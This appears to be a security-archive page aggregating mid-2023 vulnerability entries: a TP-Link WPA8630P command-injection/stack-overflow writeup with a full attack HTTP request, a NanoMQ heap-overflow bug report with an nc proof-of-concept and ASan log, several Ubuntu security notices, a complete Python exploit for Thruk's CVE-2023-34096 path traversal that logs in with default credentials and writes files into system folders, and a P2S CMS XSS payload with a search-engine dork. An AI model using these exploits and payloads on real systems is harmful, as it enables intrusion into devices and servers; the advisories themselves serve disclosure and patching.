TP-Link TL-WPA8630P (US)_ V2_ Version 171011 was discovered to contain a command injection vulnerability via the key parameter in the function sub_ 40A774.

Vulnerability introduction: Process the sub of admin/powerline in the httpd file\_ There is a command injection vulnerability in the 40A918 function (stack overflow can also be constructed). The key parameter in the function sub\_ 40A774 controlled by plc\_device is not filtered,but is directly executed by vsprintf splicing, resulting in command injection and stack overflow attack. Version: TL-WPA8630 KIT (US)\_ V2\_ Version 171011, and other versions of WPA, WR, WA and other power cat and repeater equipment.

Vulnerability static analysis  When processing web requests from/admin/powerline, run sub\_ 40A918 function  Accept the form field from the front end and judge when the form field value is plc\_ device execute sub\_40A774  Use this function to process the operation field, and execute sub when the field value is remove sub\_40A338  This function processes the value from the key field and directly splices the value into the sub\_ 4036A0 function  This function executes system commands  Directly splice the value of a1 to v6 through the insecure vsprintf function  The stack length of v6 is 0x804=2052, stack overflow will occur when the length of a1 exceeds 2052

    POST /admin/powerline HTTP/1.1
    Host: 192.168.100.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 63
    Origin: http://192.168.100.2
    Connection: close
    Referer: http://192.168.100.2/
    Cookie: Authorization=Basic%20admin%3A21232f297a57a5a743894a0e4a801fc3
    
    form=plc_device&operation=remove&key=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

 Directly splice the value of a1 to v6 through the insecure vsprintf function, and pass v6 into the function utils\_ exec\_ cmd  This function directly assigns a1 to v5, and executes commands through execvp, resulting in arbitrary command execution  getshell

CVE-2023-27837: IOT/TP-Link WPA8630P at main · lzd521/IOT

An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications.

CVE-2023-31439: Releases · systemd/systemd

Prestashop winbizpayment <= 1.0.2 is vulnerable to Incorrect Access Control via modules/winbizpayment/downloads/download.php.

CVE-2023-30198: PrestaShop/Tools.php at 6c05518b807d014ee8edb811041e3de232520c28 · PrestaShop/PrestaShop

NanoMQ 0.17.5 is vulnerable to heap-buffer-overflow in the conn_handler function of mqtt_parser.c when it processes malformed messages.

**Describe the bug**  
We found a heap-buffer-overflow in conn_handler function of mqtt_parser.c when it processes malformed messages.

**Expected behavior**  
A clear and concise description of what you expected to happen.

**Actual Behavior**  
Heap-buffer-overflow

**To Reproduce**  
start nanomq with ./nanomq start  
Send the packet：nc 127.0.0.1 1883 < ./1181-poc.raw  
1181-poc.raw.zip

conn_handler function of mqtt_parser.c:602:20  

Asan Log

> \=================================================================  
> \==3700126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000bb3c at pc 0x0000005f287d bp 0x7f8477d97950 sp 0x7f8477d97948  
> READ of size 1 at 0x60200000bb3c thread T7 (nng:task)  
> #0 0x5f287c in conn\_handler /home/user/nanomq/nng/src/sp/protocol/mqtt/mqtt\_parser.c:602:20  
> #1 0x816b7d in tcptran\_pipe\_nego\_cb /home/user/nanomq/nng/src/sp/transport/mqtt/broker\_tcp.c:363:13  
> #2 0x5b467b in nni\_taskq\_thread /home/user/nanomq/nng/src/core/taskq.c:50:4  
> #3 0x5b7d4c in nni\_thr\_wrap /home/user/nanomq/nng/src/core/thread.c:94:3  
> #4 0x5c78e0 in nni\_plat\_thr\_main /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:266:2  
> #5 0x7f847ddb4608 in start\_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread\_create.c:477:8  
> #6 0x7f847db40132 in clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86\_64/clone.S:95
> 
> 0x60200000bb3c is located 0 bytes to the right of 12-byte region \[0x60200000bb30,0x60200000bb3c)  
> allocated by thread T7 (nng:task) here:  
> #0 0x4adf1d in malloc (/home/user/nanomq/build/nanomq/nanomq+0x4adf1d)  
> #1 0x81686e in tcptran\_pipe\_nego\_cb /home/user/nanomq/nng/src/sp/transport/mqtt/broker\_tcp.c:345:18  
> #2 0x5b467b in nni\_taskq\_thread /home/user/nanomq/nng/src/core/taskq.c:50:4  
> #3 0x5b7d4c in nni\_thr\_wrap /home/user/nanomq/nng/src/core/thread.c:94:3  
> #4 0x5c78e0 in nni\_plat\_thr\_main /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:266:2  
> #5 0x7f847ddb4608 in start\_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread\_create.c:477:8
> 
> Thread T7 (nng:task) created by T0 here:  
> #0 0x498cca in pthread\_create (/home/user/nanomq/build/nanomq/nanomq+0x498cca)  
> #1 0x5c766e in nni\_plat\_thr\_init /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:279:7  
> #2 0x5b74de in nni\_thr\_init /home/user/nanomq/nng/src/core/thread.c:121:12  
> #3 0x5b3c6f in nni\_taskq\_init /home/user/nanomq/nng/src/core/taskq.c:95:8  
> #4 0x57bb04 in nni\_init\_helper /home/user/nanomq/nng/src/core/init.c:35:13  
> #5 0x5c7ef2 in nni\_plat\_init /home/user/nanomq/nng/src/platform/posix/posix\_thread.c:422:12  
> #6 0x61b6bd in nni\_proto\_mqtt\_open /home/user/nanomq/nng/src/sp/protocol.c:37:12  
> #7 0x544f4b in broker /home/user/nanomq/nanomq/apps/broker.c:871:25  
> #8 0x54ea34 in broker\_start /home/user/nanomq/nanomq/apps/broker.c:1602:7  
> #9 0x7f847da45082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
> 
> SUMMARY: AddressSanitizer: heap-buffer-overflow /home/user/nanomq/nng/src/sp/protocol/mqtt/mqtt\_parser.c:602:20 in conn\_handler  
> Shadow bytes around the buggy address:  
> 0x0c047fff9710: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa  
> 0x0c047fff9720: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa  
> 0x0c047fff9730: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa  
> 0x0c047fff9740: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa  
> 0x0c047fff9750: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa  
> \=>0x0c047fff9760: fa fa fd fd fa fa 00\[04\]fa fa 00 01 fa fa fa fa  
> 0x0c047fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> 0x0c047fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
> Shadow byte legend (one shadow byte represents 8 application bytes):  
> Addressable: 00  
> Partially addressable: 01 02 03 04 05 06 07  
> Heap left redzone: fa  
> Freed heap region: fd  
> Stack left redzone: f1  
> Stack mid redzone: f2  
> Stack right redzone: f3  
> Stack after return: f5  
> Stack use after scope: f8  
> Global redzone: f9  
> Global init order: f6  
> Poisoned by user: f7  
> Container overflow: fc  
> Array cookie: ac  
> Intra object redzone: bb  
> ASan internal: fe  
> Left alloca redzone: ca  
> Right alloca redzone: cb  
> Shadow gap: cc  
> \==3700126==ABORTING

\*\* Environment Details \*\*

*   NanoMQ version: 0.17.5 (da4d3c8)
*   Operating system and version: Ubuntu 20.04
*   Compiler and language used: gcc 9.4.0 clang 10.0.0
*   testing scenario: Run the broker(build with ASAN and TSAN) with the ./nanomq start command

CVE-2023-34488: [Security]: Vulnerability identified · Issue #1181 · emqx/nanomq

Ubuntu Security Notice 6153-1 - It was discovered that Jupyter Core executed untrusted files in the current working directory. An attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6153-1  
June 12, 2023

jupyter-core vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Jupyter Core could be made to run programs as your login if it opened a  
specially crafted file.

Software Description:  
- jupyter-core: Core common functionality of Jupyter projects (tools)

Details:

It was discovered that Jupyter Core executed untrusted files in the current  
working directory. An attacker could possibly use this issue to execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   python3-jupyter-core            4.11.1-1ubuntu0.22.10.1

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
   python3-jupyter-core            4.9.1-1ubuntu0.1~esm1

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   python3-jupyter-core            4.6.3-3ubuntu0.1~esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   python-jupyter-core             4.4.0-2ubuntu0.1~esm1  
   python3-jupyter-core            4.4.0-2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6153-1  
   CVE-2022-39286

Package Information:  
   https://launchpad.net/ubuntu/+source/jupyter-core/4.11.1-1ubuntu0.22.10.1

Ubuntu Security Notice USN-6153-1

Ubuntu Security Notice 6152-1 - It was discovered that NFS client's access cache implementation in the Linux kernel caused a severe NFS performance degradation in certain conditions. This updated makes the NFS file-access stale cache behavior to be optional.

==========================================================================  
Ubuntu Security Notice USN-6152-1  
June 08, 2023

linux-gke regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

The system could suffer with performance degradation in certain conditions.

Software Description:  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that NFS client's access cache implementation in the  
Linux kernel caused a severe NFS performance degradation in certain  
conditions. This updated makes the NFS file-access stale cache behavior  
to be optional.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1035-gke     5.15.0-1035.40  
   linux-image-gke                 5.15.0.1035.34  
   linux-image-gke-5.15            5.15.0.1035.34

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1101-gke      5.4.0-1101.108  
   linux-image-gke                 5.4.0.1101.106  
   linux-image-gke-5.4             5.4.0.1101.106

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6152-1  
   https://launchpad.net/bugs/2022098

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1035.40  
   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1101.108

Ubuntu Security Notice USN-6152-1

Thruk Monitoring Web Interface versions 3.06 and below are affected by a path traversal vulnerability.

    # Exploit Title: Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06# Date: 08-Jun-2023# Exploit Author: Galoget Latorre (@galoget)# CVE: CVE-2023-34096 (Galoget Latorre)# Vendor Homepage: https://thruk.org/# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h# Affected Versions: <= 3.06# Language: Python 3.x# Tested on:#  - Ubuntu 22.04.5 LTS 64-bit#  - Debian GNU/Linux 10 (buster) 64-bit#  - Kali GNU/Linux 2023.1 64-bit#  - CentOS GNU/Linux 8.5.2111 64-bit#!/usr/bin/python3# -*- coding:utf-8 -*-import sysimport warningsimport requestsfrom bs4 import BeautifulSoupfrom termcolor import cprint# Usage: python3 exploit.py <target.site># Example: python3 exploit.py http://127.0.0.1/thruk/# Disable warningswarnings.filterwarnings('ignore')# Set headersheaders = {    "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"}def banner():    """    Function to print the banner    """    banner_text = """ __     __     __   __  __  __      __        __   __   __  /  \\  /|_  __   _) /  \\  _)  _) __   _) |__| /  \\ (__\\ /__  \\__ \\/ |__     /__ \\__/ /__ __)     __)    | \\__/  __/ \\__)                                                                Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06Exploit & CVE Author: Galoget Latorre (@galoget)LinkedIn: https://www.linkedin.com/in/galoget"""    print(banner_text)def usage_instructions():    """    Function that validates the number of arguments.    The application MUST have 2 arguments:    - [0]: Name of the script    - [1]: Target URL (Thruk Base URL)    """    if len(sys.argv) != 2:        print("Usage: python3 exploit.py <target.site>")        print("Example: python3 exploit.py http://127.0.0.1/thruk/")        sys.exit(0)def check_vulnerability(thruk_version):    """    Function to check if the recovered version is vulnerable to CVE-2023-34096.    Prints additional information about the vulnerability.    """    try:        if float(thruk_version[1:5]) <= 3.06:            if float(thruk_version[4:].replace("-", ".")) < 6.2:                cprint("[+] ", "green", attrs=['bold'], end = "")                print("This version of Thruk is ", end = "")                cprint("VULNERABLE ", "red", attrs=['bold'], end = "")                print("to CVE-2023-34096!")                print(" |  CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")                print(" |  GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")                print(" |  CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")                print(" |  CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")                print(" |  Thruk Changelog: https://www.thruk.org/changelog.html")                print(" |  Fixed version: 3.06-2+")                print("")                return True            else:                cprint("[-] ", "red", attrs=['bold'], end = "")                print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")                return False    except:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("There was an error parsing Thruk's version.\n")        return Falsedef get_thruk_version():    """    Function to get Thruk's version via web scraping.    It also verifies the title of the website to check if the target is a Thruk instance.    """    response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)    html_soup = BeautifulSoup(response.text, "html.parser")    if "<title>Thruk Monitoring Webinterface</title>" not in response.text:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")        sys.exit(-1)    else:        # Extract version anchor tag        version_link = html_soup.find_all("a", {"class": "link text-sm"})        if len(version_link) == 1 and version_link[0].has_attr('href'):            thruk_version = version_link[0].text.strip()            cprint("[+] ", "green", attrs=['bold'], end = "")            print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")            return thruk_version        else:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("There was an error retrieving Thruk's version.")            sys.exit(-1)def get_error_info():    """    Function to cause an error in the target Thruk instance and collect additional information via web scraping.    """    # URL that will cause an error    error_url = target + "//cgi-bin/login.cgi"    # Retrieve Any initial Cookies    error_response = requests.get(error_url,                                  headers=headers,                                  allow_redirects=False,                                  verify=False,                                  timeout=10)    cprint("[*] ", "blue", attrs=['bold'], end = "")    print("Trying to retrieve additional information...\n")    try:        # Search for the error tag        html_soup = BeautifulSoup(error_response.text, "html.parser")        error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text        if len(error_report) > 0:            # Print Error Info            error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]            cprint("[+] ", "green", attrs=['bold'], end = "")            print("Recovered Information: \n")            parsed_error_report = error_report.split("\n")            for error_line in parsed_error_report:                print(f"     {error_line}")    except:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("No additional information available.\n")def get_thruk_session_auto_login():    """    Function to login into the Thruk instance and retrieve a valid session.    It will use default Thruk's credentials available here:    - https://www.thruk.org/documentation/install.html        Change credentials if required.    """    # Default Credentials - Change if required    username = "thrukadmin" # CHANGE ME    password = "thrukadmin" # CHANGE ME    params = {"login": username, "password": password}    cprint("[*] ", "blue", attrs=['bold'], end = "")    print(f"Trying to autenticate with provided credentials: {username}/{password}\n")    # Define Login URL    login_url = "cgi-bin/login.cgi"    session = requests.Session()    # Retrieve Any initial Cookies    session.get(target, headers=headers, allow_redirects=True, verify=False)    # Login and get thruk_auth Cookie    session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)    # Get Cookies as dictionary    cookies = session.cookies.get_dict()    # Successful Login    if cookies.get('thruk_auth') is not None:        cprint("[+] ", "green", attrs=['bold'], end = "")        print("Successful Authentication!\n")        cprint("[+] ", "green", attrs=['bold'], end = "")        print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")        return session    # Failed Login    else:        if cookies.get('thruk_message') == "fail_message~~login%20failed":            cprint("[-] ", "red", attrs=['bold'], end = "")            print("Login Failed, check your credentials.")            sys.exit(401)def cve_2023_34096_exploit_path_traversal(logged_session):    """    Function that attempts to exploit the Path Traversal Vulnerability.    The exploit will try to upload a PoC file to multiple common folders.    This to prevent permissions errors to cause false negatives.    """    cprint("[*] ", "blue", attrs=['bold'], end = "")    print("Trying to exploit: ", end = "")    cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])    # Define Upload URL    upload_url = "cgi-bin/panorama.cgi"    # Absolute paths    common_folders = ["/tmp/",                      "/etc/thruk/plugins/plugins-enabled/",                      "/etc/thruk/panorama/",                      "/etc/thruk/bp/",                      "/etc/thruk/thruk_local.d/",                      "/var/www/",                      "/var/www/html/",                      "/etc/",    ]    # Upload PoC file to each folder    for target_folder in common_folders:        # PoC file extension is jpg due to regex validations of Thruk.        # Nevertheless this issue can still cause damage in different ways to the affected instance.        files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}        data = {"task": "upload",                "type": "image",                "location": f"backgrounds/../../../..{target_folder}"        }        upload_response = logged_session.post(target + upload_url,                                    data=data,                                    files=files,                                    headers=headers,                                    allow_redirects=False,                                    verify=False)        try:            upload_response = upload_response.json()            if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:                cprint("[+] ", "green", attrs=['bold'], end = "")                print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")            elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":                cprint("[-] ", "red", attrs=['bold'], end = "")                print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")            else:                cprint("[-] ", "red", attrs=['bold'], end = "")                print("File upload failed.\n")        except:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("File upload failed.\n")if __name__ == "__main__":    banner()    usage_instructions()    # Change this with the domain or IP address to attack    if sys.argv[1] and sys.argv[1].startswith("http"):        target = sys.argv[1]    else:        target = "http://127.0.0.1/thruk/"    # Prepare Base Target URL    if not target.endswith('/'):        target += "/"    cprint("[+] ", "green", attrs=['bold'], end = "")    print(f"Target URL: {target}\n")    # Get Thruk version via web scraping    scraped_thruk_version = get_thruk_version()    # Send a request that will generate an error and collect extra info    get_error_info()    # Check if the instance is vulnerable to CVE-2023-34096    vulnerable_status = check_vulnerability(scraped_thruk_version)    if vulnerable_status:        cprint("[+] ", "green", attrs=['bold'], end = "")        print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")        # Confirm exploitation        option = input("\nChoice (Y/N): ").lower()        print("")        if option == "y":            cprint("[*] ", "blue", attrs=['bold'], end = "")            print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")            # Login into Thruk instance            valid_session = get_thruk_session_auto_login()            # Exploit Path Traversal Vulnerability            cve_2023_34096_exploit_path_traversal(valid_session)        elif option == "n":            cprint("[*] ", "blue", attrs=['bold'], end = "")            print("No exploitation attempts were performed, Goodbye!\n")            sys.exit(0)        else:            cprint("[-] ", "red", attrs=['bold'], end = "")            print("Unknown option entered.")            sys.exit(1)    else:        cprint("[-] ", "red", attrs=['bold'], end = "")        print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")        sys.exit(2)

Thruk Monitoring Web Interface 3.06 Path Traversal

Ubuntu Security Notice 6151-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

==========================================================================  
Ubuntu Security Notice USN-6151-1  
June 08, 2023

linux-xilinx-zynqmp vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that the KVM VMX implementation in the Linux kernel did  
not properly handle indirect branch prediction isolation between L1 and L2  
VMs. An attacker in a guest VM could use this to expose sensitive  
information from the host OS or other guest VMs. (CVE-2022-2196)

Gerald Lee discovered that the USB Gadget file system implementation in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability in some situations. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-4382)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1023-xilinx-zynqmp  5.4.0-1023.27

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6151-1  
   CVE-2021-3669, CVE-2022-2196, CVE-2022-4382, CVE-2023-23559

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1023.27

Ubuntu Security Notice USN-6151-1

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

**P2S CMS 0.1 Cross Site Scripting**

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

**P2S CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,354)
*   Arbitrary (16,067)
*   BBS (2,859)
*   Bypass (1,694)
*   CGI (1,024)
*   Code Execution (7,157)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,317)
*   DoS (23,189)
*   Encryption (2,363)
*   Exploit (51,175)
*   File Inclusion (4,195)
*   File Upload (955)
*   Firewall (821)
*   Info Disclosure (2,720)
*   Intrusion Detection (884)
*   Java (3,002)
*   JavaScript (841)
*   Kernel (6,577)
*   Local (14,393)
*   Magazine (586)
*   Overflow (12,614)
*   Perl (1,423)
*   PHP (5,124)
*   Proof of Concept (2,302)
*   Protocol (3,567)
*   Python (1,509)
*   Remote (30,515)
*   Root (3,556)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,854)
*   Shell (3,163)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,234)
*   TCP (2,394)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,597)
*   Web (9,571)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,693)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,979)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,758)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (344)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,866)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
